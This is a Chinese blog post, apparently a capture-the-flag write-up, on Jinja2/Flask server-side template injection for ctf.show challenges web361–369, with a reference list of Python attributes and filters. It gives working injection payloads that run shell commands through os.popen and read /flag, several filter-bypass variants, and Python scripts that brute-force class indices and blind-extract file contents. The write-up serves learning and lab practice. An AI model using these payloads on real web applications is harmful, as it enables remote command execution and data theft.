<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="userq"><meta name="renderer" content="webkit"><meta name="copyright" content="userq"><meta name="keywords" content="MyBlog"><meta name="description" content="MyBlog"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>SSTI · Mr.cheng's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="MyBlog" type="application/atom+xml">
</head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">userq</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//1768161086.github.io/" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Mr.cheng's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">SSTI</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-03-07</span></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><h5 id="代码块"><a href="#代码块" class="headerlink" title="代码块"></a>代码块</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">变量块 &#123;&#123;&#125;&#125;    用于将表达式打印到模板输出</span><br><span class="line">注释块 &#123;##&#125;    注释</span><br><span class="line">控制块    &#123;%%&#125;    可以声明变量，也可以执行语句</span><br><span class="line">行声明    ##        可以有和&#123;%%&#125;相同的效果</span><br></pre></td></tr></table></figure>

<h5 id="常用方法"><a href="#常用方法" class="headerlink" title="常用方法"></a>常用方法</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">__class__           查看对象所在的类</span><br><span class="line">__mro__             查看继承关系和调用顺序，返回元组</span><br><span class="line">__base__            返回基类</span><br><span class="line">__bases__           返回基类元组</span><br><span class="line">__subclasses__()    返回子类列表</span><br><span class="line">__init__            调用初始化函数，可以用来跳到__globals__</span><br><span class="line">__globals__         返回函数所在的全局命名空间所定义的全局变量，返回字典</span><br><span class="line">__builtins__        返回内建内建名称空间字典</span><br><span class="line">__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里</span><br><span class="line">__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如:a.xxx/a.xxx()）        都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。</span><br><span class="line">__getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a[&#x27;b&#x27;]，就是a.__getitem__(&#x27;b&#x27;)</span><br><span class="line">__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。</span><br><span class="line">__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()]</span><br><span class="line">__str__()            返回描写这个对象的字符串，可以理解成就是打印出来。</span><br><span class="line">url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__[&#x27;__builtins__&#x27;]含有current_app</span><br><span class="line">get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__[&#x27;__builtins__&#x27;]含有current_app</span><br><span class="line">lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：&#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line">&#123;&#123;cycler.__init__.__globals__.os.popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line">current_app          应用上下文，一个全局变量</span><br><span class="line">request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;/proc\self\fd/3&#x27;).read()</span><br><span class="line">request.args.x1        get传参</span><br><span class="line">request.values.x1      所有参数</span><br><span class="line">request.cookies      cookies参数</span><br><span class="line">request.headers      请求头参数</span><br><span class="line">request.form.x1        post传参    (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)</span><br><span class="line">request.data           post传参    (Content-Type:a/b)</span><br><span class="line">request.json         post传json  (Content-Type: application/json)</span><br><span class="line">config               当前application的所有配置。此外，也可以这样&#123;&#123;config.__class__.__init__.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read() &#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">int()        将值转换为int类型；</span><br><span class="line"></span><br><span class="line">float()        将值转换为float类型；</span><br><span class="line"></span><br><span class="line">lower()        将字符串转换为小写；</span><br><span class="line"></span><br><span class="line">upper()        将字符串转换为大写；</span><br><span class="line"></span><br><span class="line">title()        把值中的每个单词的首字母都转成大写；</span><br><span class="line"></span><br><span class="line">capitalize()    把变量值的首字母转成大写，其余字母转小写；</span><br><span class="line"></span><br><span class="line">trim()        截取字符串前面和后面的空白字符；</span><br><span class="line"></span><br><span class="line">wordcount()    计算一个长字符串中单词的个数；</span><br><span class="line"></span><br><span class="line">reverse()    字符串反转；</span><br><span class="line"></span><br><span class="line">replace(value,old,new)    替换将old替换为new的字符串；</span><br><span class="line"></span><br><span class="line">truncate(value,length=255,killwords=False)    截取length长度的字符串；</span><br><span class="line"></span><br><span class="line">striptags()    删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格；</span><br><span class="line"></span><br><span class="line">escape()或e    转义字符，会将&lt;、&gt;等符号转义成HTML中的符号。显例：content|escape或content|e。</span><br><span class="line"></span><br><span class="line">safe()        禁用HTML转义，如果开启了全局转义，那么safe过滤器会将变量关掉转义。示例： &#123;&#123;&#x27;&lt;em&gt;hello&lt;/em&gt;&#x27;|safe&#125;&#125;；</span><br><span class="line"></span><br><span class="line">list()        将变量列成列表；</span><br><span class="line"></span><br><span class="line">string()    将变量转换成字符串；</span><br><span class="line"></span><br><span class="line">join()        将一个序列中的参数值拼接成字符串。示例看上面payload；</span><br><span class="line"></span><br><span class="line">abs()        返回一个数值的绝对值；</span><br><span class="line"></span><br><span class="line">first()        返回一个序列的第一个元素；</span><br><span class="line"></span><br><span class="line">last()        返回一个序列的最后一个元素；</span><br><span class="line"></span><br><span class="line">format(value,arags,*kwargs)    格式化字符串。比如：&#123;&#123;&quot;%s&quot; - &quot;%s&quot;|format(&#x27;Hello?&#x27;,&quot;Foo!&quot;) &#125;&#125;将输出：Helloo? - Foo!</span><br><span class="line"></span><br><span class="line">length()    返回一个序列或者字典的长度；</span><br><span class="line"></span><br><span class="line">sum()        返回列表内数值的和；</span><br><span class="line"></span><br><span class="line">sort()        返回排序后的列表；</span><br><span class="line"></span><br><span class="line">default(value,default_value,boolean=false)    如果当前变量没有值，则会使用参数中的值来代替。示例：name|default(&#x27;xiaotuo&#x27;)----如果name不存在，则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值，如果想使用python的形式判断是否为false，则可以传递boolean=true。也可以使用or来替换。</span><br><span class="line"></span><br><span class="line">length()    返回字符串的长度，别名是count</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="注入思路"><a href="#注入思路" class="headerlink" title="注入思路"></a>注入思路</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.随便找一个内置类对象用__class__拿到他所对应的类</span><br><span class="line">2.用__bases__拿到基类（&lt;class &#x27;object&#x27;&gt;）</span><br><span class="line">3.用__subclasses__()拿到子类列表</span><br><span class="line">4.在子类列表中直接寻找可以利用的类getshell</span><br><span class="line"></span><br><span class="line">对象→类→基本类→子类→__init__方法→__globals__属性→__builtins__属性→eval函数</span><br></pre></td></tr></table></figure>

<h2 id="web361-无过滤"><a href="#web361-无过滤" class="headerlink" title="web361-无过滤"></a>web361-无过滤</h2><p>?name&#x3D;49</p>
<p>回显49，说明执行了语句</p>
<p>查找可以利用的函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>接下来就是要命令执行</p>
<p>比如我们要选择eval函数，就要找到包含 <code>eval</code> 函数的类，这里我知道eval函数在 <code>&lt;class &#39;warnings.catch_warnings&#39;&gt;里</code></p>
<p>利用脚本查找</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">from tqdm import tqdm</span><br><span class="line"></span><br><span class="line">for i in tqdm(range(233)):</span><br><span class="line">    url = &#x27;http://9f7c273f-592e-4f44-bec2-fcc399bdf13a.challenge.ctf.show/?name=&#123;&#123;[].__class__.__base__.__subclasses__()[&#x27; + str(</span><br><span class="line">        i) + &#x27;]&#125;&#125;&#x27;</span><br><span class="line">    r = requests.get(url=url).text</span><br><span class="line">    if (&#x27;warnings.catch_warnings&#x27; in r):</span><br><span class="line">        print(i)</span><br></pre></td></tr></table></figure>

<p>输出185</p>
<p>然后利用利用.<strong>init</strong>.<strong>globals</strong>来找os类中的。init初始化，globals全局查找</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;[].__class__.__base__.__subclasses__()[185].__init__.__globals__&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>之后搜索eval可发现built-in function即<strong>内置函数</strong>，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;[].__class__.__base__.__subclasses__()[185].__init__.__globals__.__builtins__[&#x27;eval&#x27;]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>因此无法通<code>__gloables__[&#39;eval&#39;]</code>直接调用内置函数，python的内置函数和对象全局可用，但他们不是函数内部的一部分。因此要在内部访问内置函数eval或os，需要通过<code>__builtins__</code>来访问。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;[].__class__.__base__.__subclasses__()[185].__init__.__globals__.__builtins__[&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;ls /&quot;).read()&#x27;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>2.另一种方法：</p>
<p>找os._wrap_close类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">from tqdm import tqdm</span><br><span class="line"></span><br><span class="line">for i in tqdm(range(233)):</span><br><span class="line">    url = &#x27;http://9f7c273f-592e-4f44-bec2-fcc399bdf13a.challenge.ctf.show/?name=&#123;&#123;[].__class__.__base__.__subclasses__()[&#x27; + str(</span><br><span class="line">        i) + &#x27;]&#125;&#125;&#x27;</span><br><span class="line">    r = requests.get(url=url).text</span><br><span class="line">    if (&#x27;os._wrap_close&#x27; in r):</span><br><span class="line">        print(i)</span><br></pre></td></tr></table></figure>

<p>输出132</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>其中能看到popen，于是利用其来执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&quot;&quot;.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[&#x27;popen&#x27;](&#x27;ls&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<ol start="3">
<li><strong>lipsum</strong> 和 cycler 执行命令(不需要索引)</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;lipsum.__globals__[&#x27;os&#x27;].popen(&#x27;ls /&#x27;).read()&#125;&#125;</span><br><span class="line">?name=&#123;&#123;lipsum.__globals__.os.popen(&#x27;ls /&#x27;).read()&#125;&#125;  也行</span><br></pre></td></tr></table></figure>

<h2 id="web362"><a href="#web362" class="headerlink" title="web362"></a>web362</h2><p>同上一题第一三种方法，或者第二种方法中数字改为全角数字</p>
<h2 id="web363-过滤引号-“-‘"><a href="#web363-过滤引号-“-‘" class="headerlink" title="web363(过滤引号) “ ‘"></a>web363(过滤引号) “ ‘</h2><p>1.通过<strong>request.args</strong>的get传参</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;cycler.__init__.__globals__.os.popen(request.args.a).read()&#125;&#125;&amp;a=cat /flag</span><br></pre></td></tr></table></figure>

<p><strong>2. 也通过request.form的post传参</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;cycler.__init__.__globals__.os.popen(request.form.cmd).read()&#125;&#125;</span><br><span class="line">post传：cmd=cat /flag</span><br></pre></td></tr></table></figure>

<p>3.chr拼接</p>
<p>其实就是将被单引号笼罩的字符换为ascii值,然后用+（%2b)连接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;cycler.__init__.__globals__.os.popen(chr(108)%2bchr(115)%2bchr(32)%2bchr(47)).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>4.还可以使用cookies传参</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;cycler.__init__.__globals__.os.popen(request.cookies.cmd).read()&#125;&#125;</span><br><span class="line">cookie传：cmd=cat /flag</span><br></pre></td></tr></table></figure>

<h2 id="364-过滤args-”-‘"><a href="#364-过滤args-”-‘" class="headerlink" title="364.过滤args,” ‘"></a>364.过滤args,” ‘</h2><p><code>values</code> 可以获取所有参数，从而绕过 args<br>366.过滤[],args “ ‘ _（attr方法）</p>
<hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;(lipsum|attr(request.values.a)).os.popen(request.values.b).read()&#125;&#125;&amp;a=__globals__&amp;b=cat /flag</span><br></pre></td></tr></table></figure>

<h2 id="367-过滤-args-“-‘-os"><a href="#367-过滤-args-“-‘-os" class="headerlink" title="367.过滤[],args “ ‘ _ os"></a>367.过滤[],args “ ‘ _ os</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()&#125;&#125;&amp;a=__globals__&amp;c=cat%20/flag&amp;b=os</span><br></pre></td></tr></table></figure>

<h2 id="368-过滤-args-“-‘-os花括号"><a href="#368-过滤-args-“-‘-os花括号" class="headerlink" title="368.过滤[],args “ ‘ _ os花括号"></a>368.过滤[],args “ ‘ _ os花括号</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;%print绕过</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;%print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()%&#125;&amp;a=__globals__&amp;c=cat%20/flag&amp;b=os</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**方法二：&#123;%%&#125;盲注**</span><br></pre></td></tr></table></figure>

<p>原理</p>
<blockquote>
<p><code>open(&#39;/flag&#39;).read()</code>是回显整个文件，但是read函数里加上参数：<code>open(&#39;/flag&#39;).read(1)</code>，返回的就是读出所读的文件里的i个字符，以此类推，就可以盲注出了</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"># anthor:秀儿</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url=&quot;http://3db27dbc-dccc-46d0-bc78-eff3fc21af74.chall.ctf.show:8080/&quot;</span><br><span class="line">flag=&quot;&quot;</span><br><span class="line">for i in range(1,100):</span><br><span class="line">    for j in &quot;abcdefghijklmnopqrstuvwxyz0123456789-&#123;&#125;&quot;:</span><br><span class="line">        params=&#123;</span><br><span class="line"></span><br><span class="line">            &#x27;name&#x27;:&quot;&#123;</span><br><span class="line">   &#123;% set a=(lipsum|attr(request.values.a)).get(request.values.b).open(request.values.c).read(&#123;&#125;) %&#125;&#125;&#123;</span><br><span class="line">   &#123;% if a==request.values.d %&#125;&#125;feng&#123;</span><br><span class="line">   &#123;% endif %&#125;&#125;&quot;.format(i),</span><br><span class="line">            &#x27;a&#x27;:&#x27;__globals__&#x27;,</span><br><span class="line">            &#x27;b&#x27;:&#x27;__builtins__&#x27;,</span><br><span class="line">            &#x27;c&#x27;:&#x27;/flag&#x27;,</span><br><span class="line">            &#x27;d&#x27;:f&#x27;&#123;flag+j&#125;&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">        r=requests.get(url=url,params=params)</span><br><span class="line">        if &quot;feng&quot; in r.text:</span><br><span class="line">            flag+=j</span><br><span class="line">            print(flag)</span><br><span class="line">            if j==&quot;&#125;&quot;:</span><br><span class="line">                exit()</span><br><span class="line">            break</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>注意name那里用了<code>&#123; &#123;和&#125;&#125;</code>，这是因为我用的format格式化字符串，用<code>&#123;&#125;</code>来占位，如果里面本来就有<code>&#123;</code>和<code>&#125;</code>的话，就需要用<code>&#123; &#123;</code>和<code>&#125;&#125;</code>来代替<code>&#123;</code>和<code>&#125;</code></p>
<h2 id="369-过滤-args-“-‘-os"><a href="#369-过滤-args-“-‘-os" class="headerlink" title="369.过滤[],args “ ‘ _ os"></a>369.过滤[],args “ ‘ _ os</h2></article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://1768161086.github,io">userq</a></p><p> <span>Link:  </span><a href="http://1768161086.github,io/2025/03/07/SSTI/">http://1768161086.github,io/2025/03/07/SSTI/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2025/03/10/SSRF/" title="SSRF"><span>< PreviousPost</span><br><span class="prevTitle">SSRF</span></a><a class="nextSlogan" href="/2025/03/05/Gopher%E5%8D%8F%E8%AE%AE%E6%89%93FastCGI%EF%BC%88%E7%AB%AF%E5%8F%A39000%EF%BC%89/" title="Gopher协议打FastCGI（端口9000）"><span>NextPost ></span><br><span class="nextTitle">Gopher协议打FastCGI（端口9000）</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%9D%97"><span class="toc-number">1.</span> <span class="toc-text">代码块</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E6%96%B9%E6%B3%95"><span class="toc-number">2.</span> <span class="toc-text">常用方法</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="toc-number">3.</span> <span class="toc-text">过滤器</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5%E6%80%9D%E8%B7%AF"><span class="toc-number">4.</span> <span class="toc-text">注入思路</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web361-%E6%97%A0%E8%BF%87%E6%BB%A4"><span class="toc-number"></span> <span class="toc-text">web361-无过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web362"><span class="toc-number"></span> <span class="toc-text">web362</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web363-%E8%BF%87%E6%BB%A4%E5%BC%95%E5%8F%B7-%E2%80%9C-%E2%80%98"><span class="toc-number"></span> <span class="toc-text">web363(过滤引号) “ ‘</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#364-%E8%BF%87%E6%BB%A4args-%E2%80%9D-%E2%80%98"><span class="toc-number"></span> <span class="toc-text">364.过滤args,” ‘</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#367-%E8%BF%87%E6%BB%A4-args-%E2%80%9C-%E2%80%98-os"><span class="toc-number"></span> <span class="toc-text">367.过滤[],args “ ‘ _ os</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#368-%E8%BF%87%E6%BB%A4-args-%E2%80%9C-%E2%80%98-os%E8%8A%B1%E6%8B%AC%E5%8F%B7"><span class="toc-number"></span> <span class="toc-text">368.过滤[],args “ ‘ _ os花括号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#369-%E8%BF%87%E6%BB%A4-args-%E2%80%9C-%E2%80%98-os"><span class="toc-number"></span> <span class="toc-text">369.过滤[],args “ ‘ _ os</span></a></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>